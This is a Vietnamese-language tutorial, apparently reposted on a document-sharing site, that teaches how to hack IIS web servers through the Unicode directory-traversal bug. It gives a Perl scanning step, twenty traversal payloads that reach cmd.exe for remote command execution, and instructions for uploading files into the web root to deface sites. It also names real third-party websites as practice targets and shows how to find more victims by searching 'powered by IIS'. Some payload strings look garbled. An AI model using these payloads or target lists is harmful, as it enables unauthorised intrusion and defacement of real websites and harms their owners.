Professional Documents
Culture Documents
Giới thiệu :
Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
Tôi sẽ trình bày với các bạn cách hack một website trên IIS server. Hiện nay có rất nhiều cách
hack IIS server nhưng tôi sẽ giới thiệu cho các bạn cách đơn giản nhất !
Theo thống kê của Microsoft thì có khoảng 13 triệu website trên NET hiện nay dùng IIS server
cũng như các sản phẩm của MS thì version 5 và 6 của IIS server có một lỗi rất nghiêm trong là lỗi
UNICODE (Unicode bug). Dĩ nhiên là MS đã đưa ra bản patch sửa lỗi nhưng trong số hơn 13 triệu
website tất cả đã được patch :)
Bắt đầu tiến hành :
1. Xác đinh website có dùng IIS hay không : có nhiều cách để xác đinh bằng cách dùng các
tool hacker , nhưng ở đây chúng ta chỉ cần dùng telnet, ở cửa sổ Run của Windows bạn
đánh : telnet . Rồi chọn
Lúc đó sẽ hiện lên thông báo về server của website và bạn sẽ biết nó có dùng IIS server
không ?
2. Ðồ nghể để hack : Bạn phải cài Perl trên máy (giới thiệu : dùng Active Perl 552 (~5M)
đownload ở http://www.softseek.com/ ) và file unicode (download ở đây : unicode.pl )
3. Sau khi đã cài đặt xong Perl , ở của sổ MS-DOS promt bạn gõ :
perl unicode.pl www.diachiwebsite.com:80
Chờ một chút nó sẽ tìm các bug trên IIS, có 20 bug UNICODE của IIS:
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
Hè hè !! bây giờ tôi đã vào được server của nó rồi !! muốn làm gì thì làm !! bằng các lênh
DOS cổ lỗ sĩ thông thường
Cũng thế bạn có thể mở thư muc MD, đổi tên thư mục RD, xem file, xoá file ...... như
DOS :))
5. Bây giờ quan trọng là phải đưa trang Web của mình vào đó, bạn CD vào thư mục:
c:\inetpub\wwwroot
bạn cần 3 file : cgidecoderloader.pl, upload.asp, upload.in (ở cùng một thư mục trên ổ
cứng - đownload ở đây - upload.zip)
6. Giới thiệu mọtt só website để bạn thực tập (không phải website ViêtNam) :
http://www.iwss.net/ http://www.colorworksinc.com/
http://www.ewatchanddiamond.com/ http://www.sintaks.com/ http://www.electroid.com/
http://www.aspcart.com/ http://www.cfaluminum.com/ http://www.thecapitalgroup.cc/
http://www.kristan-sp.si/ http://www.parrotnetwork.com/ http://www.enjoyusa.com/
http://www.activewebsystems.co.uk/ http://www.safeteefirst.com/
http://www.xtendafork.com/ http://vault.kupinet.com/
http://home.socal.rr.com/ .............
o Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack ,
đay là một thủ thuât dơn giản : ban vào trang http://www.av.com/ rồi search với thuât
ngữ sau : "powered by IIS"
Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ, chán thì thôi :))